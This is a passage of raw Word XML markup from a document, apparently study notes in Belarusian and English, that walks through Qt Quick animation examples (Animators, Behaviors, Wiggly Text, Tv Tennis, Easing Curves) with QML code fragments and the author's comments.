          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2197" w:name="_Toc483001005"/>
      <w:bookmarkStart w:id="2198" w:name="_Toc483003996"/>
      <w:bookmarkStart w:id="2199" w:name="_Toc483604346"/>
      <w:bookmarkStart w:id="2200" w:name="_Toc483605566"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animators</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2197"/>
      <w:bookmarkEnd w:id="2198"/>
      <w:bookmarkEnd w:id="2199"/>
      <w:bookmarkEnd w:id="2200"/>
    </w:p>
    <w:p w:rsid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Animators</w:t>
      </w:r>
      <w:r w:rsidR="00E70516">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses animators to bounce an icon up and down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70516" w:rsidRPr="00D127FB" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00E70516" w:rsidRPr="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад робіць тое ж самае, што і раней, толькі праз паралельныя анімацыі і без </w:t>
      </w:r>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>звязвання //</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SequentialAnimation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SequentialAnimation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ParallelAnimation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YAnimator</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target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smiley</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smiley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minHeight</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smiley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maxHeight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type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Easing</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OutExpo</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300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ScaleAnimator</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target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shadow</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lastRenderedPageBreak/>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1</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0.5</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type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Easing</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OutExpo</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300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ParallelAnimation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YAnimator</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target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smiley</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smiley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maxHeight</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smiley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minHeight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type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Easing</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OutBounce</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1000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ScaleAnimator</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target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shadow</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0.5</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1</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type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Easing</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OutBounce</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1000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PauseAnimation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running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true</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loops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Animation</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Infinite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2201" w:name="behaviors"/>
      <w:bookmarkStart w:id="2202" w:name="_Toc483001006"/>
      <w:bookmarkStart w:id="2203" w:name="_Toc483003997"/>
      <w:bookmarkStart w:id="2204" w:name="_Toc483604347"/>
      <w:bookmarkStart w:id="2205" w:name="_Toc483605567"/>
      <w:bookmarkEnd w:id="2201"/>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behaviors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2202"/>
      <w:bookmarkEnd w:id="2203"/>
      <w:bookmarkEnd w:id="2204"/>
      <w:bookmarkEnd w:id="2205"/>
    </w:p>
    <w:p w:rsid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Behaviors</w:t>
      </w:r>
      <w:r w:rsidR="00E70516">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses behaviors to move a rectangle to where you click.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70516" w:rsidRPr="00E70516" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00E70516" w:rsidRPr="00E70516">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Прыклад ясны. Ёсць прамавугольнік з надпісам і чатыры другіх. Калі мы на нейкі з гэтых чатырох</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> наводзім курсор, то цантральны</w:t>
      </w:r>
      <w:r w:rsidR="00E70516" w:rsidRPr="00E70516">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> яркі прамавугольнік праз звязванне становіцца на месца таго, на які мы ўказалі, з выкарыстаннем анімацыі.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Set an 'elastic' behavior on the focusRect's y property.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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NumberAnimation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type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Easing</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OutElastic</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amplitude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3.0</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period</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2.0</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300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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2206" w:name="wiggly-text"/>
      <w:bookmarkStart w:id="2207" w:name="_Toc483001007"/>
      <w:bookmarkStart w:id="2208" w:name="_Toc483003998"/>
      <w:bookmarkStart w:id="2209" w:name="_Toc483604348"/>
      <w:bookmarkStart w:id="2210" w:name="_Toc483605568"/>
      <w:bookmarkEnd w:id="2206"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wiggly Text</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2207"/>
      <w:bookmarkEnd w:id="2208"/>
      <w:bookmarkEnd w:id="2209"/>
      <w:bookmarkEnd w:id="2210"/>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRP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Wiggly Tex</w:t>
      </w:r>
      <w:r w:rsidR="00FC6AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demonstrates using more complex behaviors to animate and wiggle some text around as you drag it. It does this by assigning a complex binding to each letter:</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follow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follow</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x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follow</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width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container</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width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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRPr="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            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follow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follow</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y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container</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height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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230BC0" w:rsidRDefault="00230BC0" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then, it uses behaviors to animate the movement of each letter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C819CD" w:rsidRPr="00C819CD" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00C819CD" w:rsidRPr="00C819CD">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад зразумелы, </w:t>
      </w:r>
      <w:r w:rsidR="00C819CD" w:rsidRPr="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>але не зусім ясны код, які адбываецца, калі ў першы мома</w:t>
      </w:r>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>нт зрушваеш некую літару тэкста</w:t>
      </w:r>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>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C819CD">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x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enabled</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container</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animated</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SpringAnimation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spring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3</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damping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0.3</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mass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1.0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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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enabled</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container</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animated</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SpringAnimation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spring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3</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damping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0.3</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mass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1.0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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2211" w:name="tv-tennis"/>
      <w:bookmarkStart w:id="2212" w:name="_Toc483001008"/>
      <w:bookmarkStart w:id="2213" w:name="_Toc483003999"/>
      <w:bookmarkStart w:id="2214" w:name="_Toc483604349"/>
      <w:bookmarkStart w:id="2215" w:name="_Toc483605569"/>
      <w:bookmarkEnd w:id="2211"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tv Tennis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2212"/>
      <w:bookmarkEnd w:id="2213"/>
      <w:bookmarkEnd w:id="2214"/>
      <w:bookmarkEnd w:id="2215"/>
    </w:p>
    <w:p w:rsid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Tv Tennis</w:t>
      </w:r>
      <w:r w:rsidR="005C5097">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses complex behaviors to make the paddles follow a ball to simulate an infinite tennis game. Again, a binding which depends on other values is applied to the position and a behavior provided the animation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3DF3" w:rsidRPr="007D3DF3" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007D3DF3" w:rsidRPr="007D3DF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Прыклад разглядаць я не стаў… ён работае не вельмі добра…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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ball</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direction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'left'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ball</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y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45</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page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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>45</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on y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SpringAnimation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velocity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300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D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2216" w:name="easing-curves"/>
      <w:bookmarkStart w:id="2217" w:name="_Toc483001009"/>
      <w:bookmarkStart w:id="2218" w:name="_Toc483004000"/>
      <w:bookmarkStart w:id="2219" w:name="_Toc483604350"/>
      <w:bookmarkStart w:id="2220" w:name="_Toc483605570"/>
      <w:bookmarkEnd w:id="2216"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Easing Curves</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2217"/>
      <w:bookmarkEnd w:id="2218"/>
      <w:bookmarkEnd w:id="2219"/>
      <w:bookmarkEnd w:id="2220"/>
    </w:p>
    <w:p w:rsid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Easing Curves</w:t>
      </w:r>
      <w:r w:rsidR="007D3DF3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shows off all the easing curves available in Qt Quick animations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7638" w:rsidRPr="003C7638" w:rsidRDefault="00D127FB" w:rsidP="00230BC0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Прыклад</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="001B3733">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>мне</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="001B3733">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ясны</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="001B3733">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Выкарысто</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">ўваецца </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flickable</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> для адлюстравання спісу. Унутры яго выкарыстоўваюць </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repeater</w:t>
      </w:r>
      <w:r w:rsidR="003C7638" w:rsidRPr="003C7638">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>. У якасці мадэлі выкарыстоўваюць спіс магчымых крывых ізінга. У якасці дэлегата – тры квадраты і тэкставае меню. Пры націсканні аднаго з квадратаў ён дэманструе дадзены тып зглажвання.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
